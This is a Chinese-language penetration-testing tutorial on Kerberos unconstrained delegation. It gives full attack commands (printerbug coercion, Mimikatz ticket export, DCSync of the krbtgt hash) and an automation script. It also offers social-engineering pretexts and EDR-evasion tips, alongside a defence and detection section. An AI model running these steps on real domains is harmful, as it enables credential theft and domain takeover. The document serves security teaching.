前言技术背景在庞大的Windows域环境中Kerberos是身份认证的基石。为了让服务能够代表用户访问其他资源Kerberos引入了“委派”机制。非约束性委派Unconstrained Delegation是其中一种强大但危险的权限模式。攻击者一旦控制一个配置了非约束性委派的主机通常是服务器就能冒充访问过该主机的任意用户包括域管理员从而为权限提升到**域控制器Domain Controller, DC**打开一条高效通道。这个技术是横向移动和权限提升攻击链中的关键一环。学习价值掌握非约束性委派的攻击原理与实战方法你将能够识别域环境中的高风险配置。利用普通用户权限通过控制一个中间服务器最终获取域管理员权限。理解大型网络中身份认证凭证泄露的核心风险。学会如何检测并根除此类攻击路径提升企业安全水位。使用场景此技术在以下授权渗透测试场景中极为常见内网横向移动当你已攻陷一台服务器需要扩大战果访问网络内其他关键服务时。权限提升当你需要从一个普通服务账户或主机账户升级到域管理员级别的权限时。红蓝对抗演练模拟高级持续性威胁APT组织如何利用身份认证机制的弱点悄无声息地接管整个域。一、Kerberos非约束性委派是什么精确定义Kerberos非约束性委派Kerberos Unconstrained Delegation是一种Kerberos协议的扩展功能它允许一个服务Service A在接收到用户的认证请求后获取该用户的可转发票据授予票据Forwardable Ticket-Granting Ticket, TGT。拥有TGT后服务A便可以无限制地冒充该用户向域内的任何其他服务Service B, C, D…发起认证请求从而代表用户访问这些资源。一个通俗类比想象一下你用户把你的**万能门禁卡TGT**交给了一位酒店前台配置了非约束性委派的服务。这位前台不仅能用你的卡打开你授权的房间他自己的服务还能拿着你的万能卡去打开酒店里任何其他客人的房间、经理办公室甚至金库域内任何其他服务。这种“完全信任”就是非约束性委派的核心也是其危险所在。实际用途在早期设计中这种机制主要用于解决一些复杂应用场景。例如一个Web服务器需要代表用户去后端数据库服务器查询数据。为了简化认证流程管理员将Web服务器配置为非约束性委派这样Web服务器就能直接用用户的身份凭证去访问数据库无需用户再次输入密码。技术本质说明技术本质在于TGT的缓存。当一个用户如域管理员使用Kerberos认证访问一个配置了非约束性委派的服务器时域控制器KDC会将该用户的TGT副本连同服务票据ST一起发送给该服务器。服务器将这个TGT存储在内存LSASS进程中。攻击者只要拥有该服务器的本地管理员权限就可以从内存中提取出这个TGT然后利用它来冒充用户生成访问任何服务的票据包括用于控制整个域的krbtgt服务。以下是Kerberos非约束性委派原理的Mermaid流程图清晰地展示了TGT是如何被“窃取”的攻击者任意其他服务(如krbtgt)域控制器 (KDC)服务A(非约束性委派)用户 (如域管)攻击者任意其他服务(如krbtgt)域控制器 (KDC)服务A(非约束性委派)用户 (如域管)服务A验证票据, 并将用户的TGT缓存到本地内存(LSASS)5. 攻击者已控制服务A(拥有本地管理员权限)1. 请求访问服务A的票据 (AS-REQ)2. 返回TGT和访问服务A的ST (AS-REP)3. 提交TGT和ST (AP-REQ)4. (服务响应)6. 从LSASS内存中提取用户的TGT7. 使用窃取的TGT请求访问ServiceB的票据 (TGS-REQ)8. 返回访问ServiceB的ST (TGS-REP)KDC无法区分是合法用户还是攻击者9. 使用ST冒充用户访问ServiceB (AP-REQ)10. 认证成功提供服务这张图清晰地展示了从用户正常访问到攻击者提取凭证并冒充的完整Kerberos非约束性委派攻击原理。二、环境准备为了复现完整的攻击链你需要一个最小化的域环境。工具与版本Impacket: v0.12.0 或更高版本。Python编写的用于网络协议操作的工具集。Rubeus: v2.2.0 或更高版本。C#编写的强大的Kerberos交互和滥用工具。PowerView: 用于信息收集的PowerShell工具。Mimikatz: 用于从内存中提取凭证。下载方式Impacket:pip install impacket或从 GitHub 下载。Rubeus/Mimikatz: 从其官方GitHub Release页面下载已编译的二进制文件。核心配置命令在你的测试域控上执行以下PowerShell命令来配置一台服务器例如名为WEB-SRV01的非约束性委派# 警告以下命令会产生严重安全风险仅限在授权隔离的测试环境中使用。# 查找名为 WEB-SRV01 的计算机账户Get-ADComputer-Identity WEB-SRV01|Set-ADComputer-TrustedForDelegation$true可运行环境Docker对于没有条件搭建完整域环境的用户可以使用开源的Docker化域环境快速启动一个测试靶场例如 Windows AD Docker。三、核心实战本节将演示一个完整的非约束性委派实战攻击流程。场景我们已获得普通域用户lowuser的密码并发现域内服务器WEB-SRV01.corp.localIP: 192.168.1.100配置了非约束性委派。我们的目标是获取域管权限。步骤1信息收集 - 发现目标目的作为lowuser在域内寻找配置了非约束性委派的主机。使用PowerView或Impacket的findDelegation.py脚本。# 警告此脚本将查询活动目录仅限在授权测试环境中使用。# 使用Impacket查找委派关系# 参数说明:# -dc-ip: 域控IP# corp.local/lowuser:password: 凭证python3 findDelegation.py -dc-ip192.168.1.10 corp.local/lowuser:Password123!输出结果预期:[*] Searching for delegation relationships in corp.local ... [*] Found Unconstrained Delegation hosts: WEB-SRV01.corp.local ...我们确认WEB-SRV01是我们的目标。步骤2触发认证 - 诱导高权限用户访问目的让域管理员账户访问WEB-SRV01从而使其TGT被缓存到服务器内存中。在真实攻击中这通常通过钓鱼、社工或利用系统管理任务如定时备份、软件分发来实现。在我们的测试中我们可以主动触发。这里我们使用Impacket的printerbug.py它利用打印机服务的一个特性强制任意主机向我们指定的主机进行认证。# 警告此脚本会强制目标主机进行网络认证可能触发警报仅限授权测试。# 参数说明:# -dc-host: 域控主机名# -target: 我们要强制认证的主机这里是域控自身因为域控通常有域管会话# 192.168.1.100: 我们控制的、配置了非约束性委派的服务器IPpython3 printerbug.py -dc-host DC01.corp.local corp.local/lowuser:Password123!-targetDC01192.168.1.100输出结果预期:[*] Attempting to trigger authentication from DC01 to 192.168.1.100 [] Triggered authentication, check your listener此时域控的计算机账户DC01$的TGT已经被发送到WEB-SRV01并缓存。步骤3提取票据 - 从内存中导出TGT目的在WEB-SRV01上从LSASS进程中导出我们刚刚捕获的DC01$的TGT。假设我们已经通过其他方式获得了WEB-SRV01的本地管理员权限。我们上传并执行Mimikatz。# 警告Mimikatz是强大的黑客工具会被所有杀毒软件查杀。仅限授权测试。# 提升权限并导出票据privilege::debug sekurlsa::tickets/export输出结果预期:Mimikatz会列出内存中所有的Kerberos票据并将其保存为.kirbi文件。我们会找到一个类似[0;000abcde]-2-0-60a10000-DC01$krbtgt-CORP.LOCAL.kirbi的文件。这个文件就是DC01$账户的TGT。步骤4注入票据并发起攻击 - 冒充DC同步域哈希目的使用窃取的DC01$的TGT冒充域控执行DCSync攻击获取所有域用户的哈希包括krbtgt的哈希。我们将.kirbi文件下载到攻击机并使用Impacket的secretsdump.py进行DCSync。# 警告DCSync是极其危险的操作会直接导致域沦陷。仅限授权测试。# 设置环境变量让impacket使用我们的票据exportKRB5CCNAME/path/to/your/ticket.kirbi# 执行DCSync# 参数说明:# -k: 使用Kerberos认证配合KRB5CCNAME# -no-pass: 无需密码# -just-dc-user krbtgt: 只dump krbtgt用户的哈希# DC01.corp.local: 目标域控python3 secretsdump.py-k-no-pass -just-dc-user krbtgt DC01.corp.local输出结果预期:[*] Dumping Domain Credentials for corp.local ... krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ffb...[SNIP]...55d::: ...至此我们已成功获取krbtgt的哈希可以制作黄金票据完全接管整个域。自动化攻击脚本以下是一个简化的Python脚本用于自动化发现和利用的过程。# Filename: auto_unconstrained_delegation.py# WARNING: This script performs actions that are highly intrusive and should# only be run in a fully authorized and controlled test environment.# Unauthorized use is illegal.importosimportsysimportargparseimportsubprocessdeffind_delegation_hosts(dc_ip,domain,user,password):Finds hosts with unconstrained delegation.print([*] Searching for unconstrained delegation hosts...)try:# 使用impacket的findDelegation.pycmd[python3,impacket/examples/findDelegation.py,f{domain}/{user}:{password},-dc-ip,dc_ip]resultsubprocess.run(cmd,capture_outputTrue,textTrue,checkTrue)hosts[]forlineinresult.stdout.splitlines():ifFound Unconstrained Delegation hosts:inline:# 解析输出以获取主机列表# 这是一个简化的例子实际解析可能更复杂next_line_indexresult.stdout.splitlines().index(line)1ifnext_line_indexlen(result.stdout.splitlines()):hosts.append(result.stdout.splitlines()[next_line_index].strip())ifnothosts:print([-] No unconstrained delegation hosts found.)returnNoneprint(f[] Found hosts:{hosts})returnhosts[0]# 返回第一个找到的主机exceptsubprocess.CalledProcessErrorase:print(f[!] Error during search:{e.stderr})returnNoneexceptExceptionase:print(f[!] An unexpected error occurred:{e})returnNonedeftrigger_auth(dc_ip,domain,user,password,target_dc,listener_host):Triggers authentication from a target to our listener.print(f[*] Triggering authentication from{target_dc}to{listener_host}...)try:# 使用impacket的printerbug.pycmd[python3,impacket/examples/printerbug.py,f{domain}/{user}:{password},-dc-ip,dc_ip,-target,target_dc,listener_host]resultsubprocess.run(cmd,capture_outputTrue,textTrue,timeout30)ifTriggered authenticationinresult.stdout:print([] Authentication triggered successfully.)returnTrueelse:print(f[-] Failed to trigger authentication:{result.stderr})returnFalseexceptsubprocess.TimeoutExpired:print([] Printerbug command sent. It may not provide immediate feedback. Assuming success.)returnTrueexceptExceptionase:print(f[!] Error triggering auth:{e})returnFalseif__name____main__:parserargparse.ArgumentParser(descriptionAutomated Unconstrained Delegation Attack Demo)parser.add_argument(-u,--user,requiredTrue,helpUsername for authentication)parser.add_argument(-p,--password,requiredTrue,helpPassword for authentication)parser.add_argument(-d,--domain,requiredTrue,helpTarget domain (e.g., corp.local))parser.add_argument(--dc-ip,requiredTrue,helpDomain Controller IP address)parser.add_argument(--target-dc,requiredTrue,helpThe DC to force authenticate (e.g., DC01))argsparser.parse_args()print(--- WARNING: AUTHORIZED TESTING ONLY ---)# 1. 查找委派主机delegation_hostfind_delegation_hosts(args.dc_ip,args.domain,args.user,args.password)ifnotdelegation_host:sys.exit(1)# 2. 触发认证# 假设我们已经控制了delegation_host并且知道其IP# 在此脚本中我们仅演示触发部分print(f\n[] Next step: Manually compromise {delegation_host} and get its IP.)print(f[] Then, run a tool like Mimikatz on it to dump tickets.)listener_ipinput(fEnter the IP of the compromised host {delegation_host}: )iftrigger_auth(args.dc_ip,args.domain,args.user,args.password,args.target_dc,listener_ip):print(\n[] Attack chain initiated. Now, on your compromised host:)print(1. Run Mimikatz: privilege::debug and sekurlsa::tickets /export)print(2. Find the .kirbi ticket for the DC computer account (e.g., DC01$).)print(3. Copy the ticket to your attack machine.)print(4. Set KRB5CCNAME: export KRB5CCNAME/path/to/ticket.kirbi)print(f5. Run secretsdump: secretsdump.py -k -no-pass{args.domain}/{args.user}{args.target_dc})else:print([!] Attack failed.)四、进阶技巧常见错误票据不出现诱导认证后在委派服务器上未发现目标用户的TGT。原因可能是1) 目标用户未使用Kerberos认证如使用了NTLM2) 认证未成功触发3) 票据已被系统清理。DCSync权限不足使用提取的票据执行DCSync时报DRSUAPI_ERROR_ACCESS_DENIED。原因可能是1) 提取的不是DC计算机账户的TGT2) 票据已过期。DC计算机账户的TGT才默认拥有DCSync权限。性能 / 成功率优化精准诱导与其盲目等待不如主动寻找让域管连接你控制的服务器的理由。例如报告一个需要“IT支持”的虚假问题或利用计划任务、登录脚本等自动化运维工具。监控LSASS在已控的委派服务器上可以持续监控LSASS进程一旦有新的Kerberos票据生成立即自动导出避免票据过期或被覆盖。Rubeus的monitor功能可以实现这一点。实战经验总结非约束性委派是“高价值目标”。在内网中一旦发现此类主机应将其作为首要攻击目标。域控制器DC本身也是计算机账户默认情况下它们不应该被配置为非约束性委派。但如果错误配置将是灾难性的。除了DC计算机账户任何属于Domain Admins组的用户或属于Administrators组的用户登录委派服务器其TGT都可被利用来提升权限。对抗 / 绕过思路EDR/AV绕过直接在磁盘上运行Mimikatz很容易被杀。应学习内存加载、混淆、禁用安全产品等技巧。使用如Rubeus这类更专注于Kerberos的工具其特征码相对较少。网络层绕过如果网络策略限制了从委派服务器到其他关键服务器的直接访问可以利用提取的TGT在攻击机上生成服务票据ST然后通过代理或SOCKS隧道将攻击流量转发到内网。利用约束性委派S4U2Proxy如果找不到非约束性委派可以寻找约束性委派和资源基础的约束性委派它们虽然限制更多但同样能构成有效的提权路径。五、注意事项与防御错误写法 vs 正确写法错误为了方便给应用服务器配置非约束性委派。Set-ADComputer -Identity APPSRV01 -TrustedForDelegation $true正确如果必须使用委派优先使用资源基础的约束性委派Resource-Based Constrained Delegation, RBCD它将信任关系反转由资源方如数据库决定谁可以委派访问自己风险最小。其次是传统的约束性委派它限制了服务只能访问特定的其他服务。风险提示任何配置了非约束性委派的主机都应被视为与域控同等级别的安全资产。控制了该主机的本地管理员就约等于控制了所有曾登录过该主机的用户的身份。开发侧安全代码范式应用架构设计时应避免需要模拟用户身份访问多种后端服务的场景。优先使用服务账户或OAuth2.0等现代认证授权框架。如果必须委派应在代码中明确指定允许委派访问的目标服务SPN并使用约束性委派。运维侧加固方案禁用非约束性委派在全域范围内审查并禁用所有不必要的非约束性委派。# 查找所有配置了非约束性委派的计算机和用户Get-ADObject-FilteruserAccountControl -band 524288# 禁用它# Set-ADComputer/User -Identity ObjectName -TrustedForDelegation $false启用“受保护的用户”组将所有高权限账户如域管理员添加到Protected Users安全组。该组内的用户无法进行委派其TGT也不会被缓存到不安全的服务器上。启用Credential Guard在支持的Windows版本上启用Credential Guard它使用虚拟化技术隔离LSASS进程阻止Mimikatz等工具直接读取内存中的凭证。日志检测线索事件ID 4769 (A Kerberos service ticket was requested)在域控上监控此事件。如果一个服务的票据请求中Ticket Options包含0x40000000(Forwardable)且该票据被发送到一个不应接收可转发票据的主机这可能是可疑的。事件ID 4624 (An account was successfully logged on)在配置了非约束性委派的服务器上监控高权限用户的登录事件特别是登录类型为3网络登录且认证协议为Kerberos的事件。DCSync行为检测监控来自非域控主机的目录复制请求DRSUAPI。这是DCSync攻击的明确指标。总结核心知识非约束性委派允许服务器获取访问者的TGT从而无限制地冒充该用户。控制此类服务器是通向域控的关键路径。使用场景主要用于内网中的横向移动和权限提升特别是从一个已控服务器升级到域管理员。防御要点核心防御策略是禁用非约束性委派将高权限用户加入**Protected Users组**并启用Credential Guard。知识体系连接此技术与Kerberos认证、票据传递Pass-the-Ticket、DCSync和**黄金票据Golden Ticket**攻击紧密相连是整个域渗透攻击链中的一环。进阶方向深入研究**约束性委派S4U2Self, S4U2Proxy和资源基础的约束性委派RBCD**的攻击方法它们是更现代、更隐蔽的委派攻击技术。自检清单是否说明技术价值(是在前言中明确)是否给出学习目标(是在前言中明确)是否有 Mermaid 核心机制图(是在“是什么”部分)是否有可运行代码(是提供了多个Impacket命令和自动化脚本示例)是否有防御示例(是在“注意事项与防御”部分提供了PowerShell加固命令)是否连接知识体系(是在总结中关联了其他域攻击技术)是否避免模糊术语(是对关键术语进行了定义和类比)